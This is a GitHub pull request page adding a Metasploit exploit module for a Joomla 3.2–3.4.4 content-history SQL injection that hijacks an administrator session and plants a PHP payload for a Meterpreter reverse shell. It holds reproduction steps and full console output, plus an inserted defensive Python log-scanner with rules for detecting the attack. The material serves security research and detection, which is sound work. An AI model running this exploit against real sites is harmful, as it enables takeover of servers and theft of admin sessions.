Add Joomla Content History SQLi RCE exploit module #6129

Merged
merged 1 commit into from Nov 20, 2015

@xistence
Contributor

xistence commented Oct 23, 2015

This module exploits Asaf Orpani@Trustwave's Joomla SQLi in versions 3.2 up to 3.4.4. After gaining Administrator access it will create an extra template file with our payload, which provides a shell.

Steps to reproduce:

  • Deploy https://github.com/joomla/joomla-cms/releases/download/3.4.4/Joomla_3.4.4-Stable-Full_Package.zip on a linux VM (tested on Ubuntu 15.04)
  • Install through the web browser, keep everything default
  • Log in to the administrator portal at http:///administrator
  • Click on "New Article" -> Title: "Anything" -> Body: "Anything" -> Save (Needed for some actual data in the _ucm_history table)
  • Make sure that you are still logged in as an Administrator (Super User) when you run the exploit module (as the SQLi will retrieve the admin session)
  • Run the exploit! :)

msf > use exploit/unix/webapp/joomla_contenthistory_sqli_rce
msf exploit(joomla_contenthistory_sqli_rce) > set RHOST 192.168.2.130
RHOST => 192.168.2.130
msf exploit(joomla_contenthistory_sqli_rce) > exploit

[*] Started reverse handler on 192.168.2.50:4444
[*] 192.168.2.130:80 - Retrieved table prefix [ n13xt ]
[*] 192.168.2.130:80 - Retrieved admin cookie [ lvhjcpr08827qa2g45l537ct67 ]
[*] 192.168.2.130:80 - Retrieved unauthenticated cookie [ 8ec83d68fe7891e981f2e286f15b31d3 ]
[*] 192.168.2.130:80 - Successfully authenticated as Administrator
[*] 192.168.2.130:80 - Creating file [ b6iu7Dy.php ]
[*] 192.168.2.130:80 - Following redirect to [ /administrator/index.php?option=com_templates&view=template&id=503&file=L2I2aXU3RHkucGhw ]
[*] 192.168.2.130:80 - Token [ b062c55811a959dd9cd0f209311cecdb ] retrieved
[*] 192.168.2.130:80 - Template path [ /templates/beez3/ ] retrieved
[*] 192.168.2.130:80 - Insert payload into file [ b6iu7Dy.php ]
[*] 192.168.2.130:80 - Payload data inserted into [ b6iu7Dy.php ]
[*] 192.168.2.130:80 - Executing payload
[*] Sending stage (33068 bytes) to 192.168.2.130
[*] Meterpreter session 1 opened (192.168.2.50:4444 -> 192.168.2.130:46526) at 2015-10-23 16:55:26 +0700
[+] Deleted b6iu7Dy.php

meterpreter > getuid
Server username: www-data (33)
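The module output above leaves two traces in a web server's access log that a defender can key on: the template editor being opened on a base64-encoded file name that is not part of the template (the redirect with file=L2I2aXU3RHkucGhw, which decodes to /b6iu7Dy.php), and a direct request to a PHP file under /templates/<name>/ when the payload is executed. The following is an added example, not code from the PR or the Metasploit module: a small Python checker that runs both rules over constructed Common Log Format lines. The KNOWN_TEMPLATE_FILES allowlist, the sample log lines, and the function names (decode_file_param, analyse_request, scan_log) are assumptions of this example.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Files a stock Joomla template directory is expected to contain (assumption;
# extend this allowlist with the templates actually deployed on the site).
KNOWN_TEMPLATE_FILES = {"index.php", "error.php", "component.php", "offline.php"}

# Common Log Format with the request line split out (assumed log format).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
TEMPLATE_DIR_RE = re.compile(r"^/templates/[^/]+/(?P<name>[^/]+\.php)$", re.IGNORECASE)

# Constructed access-log lines (not from the PR). Line 3 reproduces the
# template-editor redirect shown in the module output; line 4 is the direct
# request that the "Executing payload" step would produce.
SAMPLE_LOG = """\
192.168.2.50 - - [23/Oct/2015:16:55:20 +0700] "GET /administrator/index.php HTTP/1.1" 200 3810
192.168.2.50 - - [23/Oct/2015:16:55:22 +0700] "GET /administrator/index.php?option=com_templates&view=template&id=503&file=aW5kZXgucGhw HTTP/1.1" 200 12040
192.168.2.50 - - [23/Oct/2015:16:55:24 +0700] "GET /administrator/index.php?option=com_templates&view=template&id=503&file=L2I2aXU3RHkucGhw HTTP/1.1" 200 11980
192.168.2.50 - - [23/Oct/2015:16:55:26 +0700] "GET /templates/beez3/b6iu7Dy.php HTTP/1.1" 200 0
"""


def decode_file_param(value):
    """Decode the base64-encoded 'file' parameter of the Joomla template editor.
    Returns None when the value is not valid standard base64."""
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def analyse_request(client, time, target):
    """Return a finding dict for one request, or None if nothing is suspicious."""
    url = urlsplit(target)
    params = parse_qs(url.query)
    option = params.get("option", [""])[0]
    view = params.get("view", [""])[0]
    file_param = params.get("file", [None])[0]

    # Rule 1: template editor opened on a .php file that is not part of the template.
    if (url.path == "/administrator/index.php" and option == "com_templates"
            and view == "template" and file_param):
        decoded = decode_file_param(file_param)
        name = decoded.rsplit("/", 1)[-1] if decoded else None
        if name and name.lower().endswith(".php") and name not in KNOWN_TEMPLATE_FILES:
            return {"client": client, "time": time, "rule": "template-editor-new-php",
                    "detail": f"editor opened on unexpected template file {decoded!r}"}

    # Rule 2: a PHP file under /templates/<name>/ requested directly by a client.
    m = TEMPLATE_DIR_RE.match(url.path)
    if m and m.group("name") not in KNOWN_TEMPLATE_FILES:
        return {"client": client, "time": time, "rule": "direct-template-php-request",
                "detail": f"direct request to {url.path}"}
    return None


def scan_log(text):
    """Run both rules over every parseable line and return the findings in order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than crash on them
        finding = analyse_request(m.group("client"), m.group("time"), m.group("target"))
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['rule']}: {f['detail']}")
```

Rule 1 fires on the editor request for b6iu7Dy.php but not on the one for index.php, and rule 2 fires on the direct fetch of /templates/beez3/b6iu7Dy.php. Both rules depend on the allowlist matching the templates installed on the site, so tune KNOWN_TEMPLATE_FILES before relying on them; a file-integrity check on the templates directory complements the log view, since the module deletes its file once the session is open.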
@espreto
Contributor

espreto commented Oct 23, 2015

There is already a PR to the same module. #6125

@wchen-r7
Contributor

wchen-r7 commented Oct 23, 2015

@espreto Indeed they are for the same vulnerability. #6125 is an auxiliary module that goes after usernames/passwords/hashes/etc, and this one gives you a shell.

@wvu-r7
Contributor

wvu-r7 commented Oct 23, 2015

I'll grab this over the weekend along with #6125. Thanks for the PR, @xistence.

@madmike33
madmike33 commented Nov 7, 2015

Well, I wonder why it says no administrator logged in. In the new version of Joomla you only need the admin session ID to be able to log in to the Joomla admin; he doesn't need to be online, I guess.

@wvu-r7 wvu-r7 merged commit f632dd8 into rapid7:master Nov 20, 2015

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed

wvu-r7 added a commit that referenced this pull request Nov 20, 2015
